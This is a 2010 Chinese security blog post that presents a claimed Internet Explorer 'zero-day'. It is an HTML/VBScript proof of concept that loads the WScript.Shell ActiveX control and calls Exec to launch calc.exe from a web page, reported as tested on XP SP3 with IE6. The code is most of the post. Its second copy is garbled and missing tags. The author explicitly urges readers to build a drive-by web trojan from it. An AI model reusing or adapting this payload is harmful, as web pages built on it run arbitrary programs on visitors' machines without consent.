又一个IE的最新0DAY（IE浏览器wshom.ocx ActiveX控件远程代码执行）

2010年01月19日 | category

工具收集| 坏人咖啡

这段代码在SP3+IE6下测试成功

测试代码：


&lt;html&gt;

&lt;p align="left"&gt;&lt;b&gt;&lt;font face="Segoe Script" size="7"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;

&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;

&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;

&lt;object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target' &gt;&lt;/object&gt;

&lt;script language='vbscript'&gt;



arg1="c:\WINDOWS\system32\calc.exe"



target.Exec arg1



&lt;/script&gt;&lt;/p&gt;

<html>

<p align="left"><b><font face="Segoe Script" size="7">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

</font></b></p>

<p>

arg1="c:\WINDOWS\system32\calc.exe"

target.Exec arg1

</script></p>

有兴趣的同学可以回去搞一下，弄个网马出来！

所属分类: 工具收集
Tags: 0DAY, IE

« Linux crontab 命令格式与详细例子

一条评论

评论 by:
流浪的风

很强大，还真能跳出计算器呢，看来IE还真不安全。。。

RSS feed for comments on this post.

对不起，该文章的评论被关闭了！

文章分类
热门标签
- 0DAY 360 bypass dreamhost ecshop google IE ie6 Linux mysql nginx php pin Python QQ Remote sql ubuntu windows XSS 人人网卸载后台命令咖啡备份字典微博忙提权攻击文件旁注本地注入源码漏洞爱情瑞星百度破解解析跨域跨站钓鱼
随机文章
文章归档
Users
- 登录

又一个IE的最新0DAY（IE浏览器wshom.ocx ActiveX控件远程代码执行）

一条评论

文章分类

热门标签

随机文章

文章归档

Users